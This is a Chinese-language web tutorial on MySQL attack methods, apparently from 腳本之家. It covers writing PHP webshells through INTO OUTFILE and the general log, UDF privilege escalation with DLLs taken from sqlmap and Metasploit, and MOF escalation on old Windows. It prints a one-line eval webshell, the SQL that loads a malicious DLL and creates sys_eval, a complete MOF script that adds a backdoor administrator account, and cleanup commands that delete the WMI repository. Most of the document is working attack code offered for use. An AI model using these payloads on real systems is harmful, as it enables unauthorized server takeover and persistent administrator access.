目錄
- 一��、寫入Webshell
- into outfile 寫shell
- 日志文件寫shell
- 二�����、UDF提權(quán)
- 三�、MOF提權(quán)
- 總結(jié)
一、寫入Webshell
into outfile 寫shell
前提條件:
1��、知道網(wǎng)站物理路徑
2、高權(quán)限數(shù)據(jù)庫用戶
3�、load_file() 開啟 即 secure_file_priv 無限制
4、網(wǎng)站路徑有寫入權(quán)限
首先基礎(chǔ)語法查詢是否 secure_file_priv 沒有限制
show global variables like '%secure_file_priv%';
| value |
說明 |
| NULL |
不允許導(dǎo)入或?qū)С?/td>
|
| /var |
只允許在/var目錄導(dǎo)入導(dǎo)出 |
| 空 |
不限制目錄 |
在 MySQL 5.5 之前 secure_file_priv 默認(rèn)是空����,這個(gè)情況下可以向任意絕對(duì)路徑寫文件
在 MySQL 5.5之后 secure_file_priv 默認(rèn)是 NULL,這個(gè)情況下不可以寫文件
如果滿足上述所有條件的話����,那么可以嘗試使用下面的 SQL 語句來直接寫 shell:
select '?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php';
查看目標(biāo)路徑下,已寫入shell.php文件
上菜刀連接
日志文件寫shell
前提條件:
1�、Web 文件夾寬松權(quán)限可以寫入
2、Windows 系統(tǒng)下
3���、高權(quán)限運(yùn)行 MySQL 或者 Apache
MySQL 5.0 版本以上會(huì)創(chuàng)建日志文件���,可以通過修改日志的全局變量來 getshell
查看日志目錄
SHOW VARIABLES LIKE 'general%';
general_log 默認(rèn)關(guān)閉,開啟它可以記錄用戶輸入的每條命令���,會(huì)把其保存在對(duì)應(yīng)的日志文件中�����。
可以嘗試自定義日志文件��,并向日志文件里面寫入內(nèi)容的話�,那么就可以成功 getshell:
更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';
查看當(dāng)前日志配置
目標(biāo)目錄下查看����,寫入了log.php文件
寫入shell
select '?php @eval($_POST[cmd]); ?>'
上菜刀,連接
二���、UDF提權(quán)
自定義函數(shù)���,是數(shù)據(jù)庫功能的一種擴(kuò)展。用戶通過自定義函數(shù)可以實(shí)現(xiàn)在 MySQL 中無法方便實(shí)現(xiàn)的功能���,其添加的新函數(shù)都可以在SQL語句中調(diào)用����,就像調(diào)用本機(jī)函數(shù) version() 等方便��。
動(dòng)態(tài)鏈接庫
如果是 MySQL >= 5.1 的版本��,必須把 UDF 的動(dòng)態(tài)鏈接庫文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創(chuàng)建自定義函數(shù)�����。
那么動(dòng)態(tài)鏈接庫文件去哪里找呢?實(shí)際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對(duì)應(yīng)系統(tǒng)的動(dòng)態(tài)鏈接庫文件��。
sqlmap的UDF動(dòng)態(tài)鏈接庫文件位置
sqlmap根目錄/data/udf/mysql
不過 sqlmap 中 自帶這些動(dòng)態(tài)鏈接庫為了防止被誤殺都經(jīng)過編碼處理過�,不能被直接使用。不過可以利用 sqlmap 自帶的解碼工具cloak.py 來解碼使用���,cloak.py 的位置為:sqlmap根目錄/extra/cloak/cloak.py ����,
解碼方法如下:
解碼32位的windows動(dòng)態(tài)鏈接庫:
python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll
其他linux和windows動(dòng)態(tài)鏈接庫解碼類似
或者直接使用metasploit自帶的動(dòng)態(tài)鏈接庫���,無需解碼
Metasploit的UDF動(dòng)態(tài)鏈接庫文件位置
接下來的任務(wù)是把 UDF 的動(dòng)態(tài)鏈接庫文件放到 MySQL 的插件目錄下���,這個(gè)目錄改如何去尋找呢?可以使用如下的 SQL 語句來查詢:
show variables like '%plugin%'
寫入動(dòng)態(tài)鏈接庫
當(dāng) secure_file_priv 無限制的時(shí)候���,我們可以手工寫文件到 plugin 目錄下的
select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll') into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';
c
創(chuàng)建自定義函數(shù)并調(diào)用命令
創(chuàng)建自定義函數(shù)
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
查看是否新增了sys_eval
接著就可以通過創(chuàng)建的這個(gè)函數(shù)來執(zhí)行系統(tǒng)命令了:
刪除自定義函數(shù)
三���、MOF提權(quán)
mof提權(quán)原理
關(guān)于 mof 提權(quán)的原理其實(shí)很簡(jiǎn)單,就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件�����,每分鐘都會(huì)在一個(gè)特定的時(shí)間去執(zhí)行一次的特性,來寫入我們的cmd命令使其被帶入執(zhí)行�����。
嚴(yán)苛的前提條件:
1.windows 03及以下版本
2.mysql啟動(dòng)身份具有權(quán)限去讀寫c:/windows/system32/wbem/mof目錄
3.secure-file-priv參數(shù)不為null
提權(quán)過程:
MOF文件每五秒就會(huì)執(zhí)行�����,而且是系統(tǒng)權(quán)限����,我們通過mysql使用load_file 將文件寫入/wbme/mof��,然后系統(tǒng)每隔五秒就會(huì)執(zhí)行一次我們上傳的MOF���。MOF當(dāng)中有一段是vbs腳本�����,我們可以通過控制這段vbs腳本的內(nèi)容讓系統(tǒng)執(zhí)行命令�����,進(jìn)行提權(quán)���。
利用代碼如下(test.mof):
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
MOF文件利用:
將上面的腳本上傳到有讀寫權(quán)限的目錄下:
這里我上傳到了C:\soft\����,我們使用sql語句將文件導(dǎo)入到c:/windows/system32/wbem/mof/下
select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"
驗(yàn)證提權(quán):
當(dāng)我們成功把mof導(dǎo)出時(shí)��,mof就會(huì)直接被執(zhí)行��,且5秒創(chuàng)建一次用戶�。
關(guān)于MOF提權(quán)弊端
我們提權(quán)成功后,就算被刪號(hào)�,mof也會(huì)在五秒內(nèi)將原賬號(hào)重建,那么這給我們退出測(cè)試造成了很大的困擾�����,所以謹(jǐn)慎使用����。那么我們?nèi)绾蝿h掉我們的入侵賬號(hào)呢?
cmd 下運(yùn)行下面語句:
#停止winmgmt服務(wù)
net stop winmgmt
#刪除 Repository 文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\
# 手動(dòng)刪除 mof 文件
del c:/windows/system32/wbem/mof/nullevt.mof /F /S
# 刪除創(chuàng)建的用戶
net user hpdoger /delete
#重啟服務(wù)
net start winmgmt
總結(jié)
到此這篇關(guān)于Mysql提權(quán)姿勢(shì)的文章就介紹到這了,更多相關(guān)Mysql提權(quán)姿勢(shì)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家��!
您可能感興趣的文章:- Linux利用UDF庫實(shí)現(xiàn)Mysql提權(quán)
- Mysql提權(quán)方法利用
- 提權(quán),以MySQL之名
